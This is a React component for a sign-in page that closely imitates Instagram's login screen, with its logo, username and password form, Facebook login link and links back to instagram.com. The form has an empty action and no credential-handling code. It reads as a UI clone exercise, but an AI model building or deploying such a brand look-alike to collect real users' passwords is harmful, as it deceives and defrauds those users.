import React from "react";

import Footer from "../components/Footer";
import "../styles/Signin.css";
class Signin extends React.Component {
  render() {
    return (
      <div>

<div class="flex-container">
          <div class="login">


<a href="/">
            <h1><img class="image" src="https://i.imgur.com/wvLiKam.png" width="200px" height="68px" /></h1> </a>

            <form class="form" action="" method="POST">

              <input placeholder="Phone number, username, or email" type="text" name="username" required />
              <input placeholder="Password" type="password" name="password" required />

              <input type="submit" value="Log In" /><br></br>

            </form>

            <div class="divider"> <b>OR</b> </div>

            <div class="fbwrapper"><div class="fb"><a href="https://facebook.com"><img src="https://i.imgur.com/exksovo.png" />  Log in with Facebook</a></div></div>

            <div class="forgotwrapper"><div class="forgot"><a href="https://instagram.com">Forgot password?</a></div></div>


          </div>


          <div class="infobox">

            <p>Don't have an account? <a href="https://instagram.com">Sign up</a></p>

          </div>

          <div class="apps">

            <p>Get the app.</p>
            {/* <span><a href="https://apps.apple.com/app/instagram/id389801252?vt=lo"><img class="image" src="https://i.imgur.com/lREV6Qa.png" height="45px" width="153px"/></a>
  
  <a   align="right" href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3DXRR9_gALAAHKOzMSO3MkAOZ0JJtC%26utm_content%3Dlo%26utm_medium%3Dbadge">
    <img class="image"src="https://i.imgur.com/DFQNKXK.png" height="45" width="151px"/></a></span> */}

            <div class="dl-links">
              <a class="app-dl-links" href="#"><img src="https://developer.apple.com/assets/elements/badges/download-on-the-app-store.svg" alt="" /></a>
              <a class="app-dl-links" href="#"><img src="https://lh3.googleusercontent.com/cjsqrWQKJQp9RFO7-hJ9AfpKzbUb_Y84vXfjlP0iRHBvladwAfXih984olktDhPnFqyZ0nu9A5jvFwOEQPXzv7hr3ce3QVsLN8kQ2Ao=s0" alt="" /></a>
            </div>




          </div>
        </div>
        <Footer />
      </div>



    );
  }
}
export default Signin;
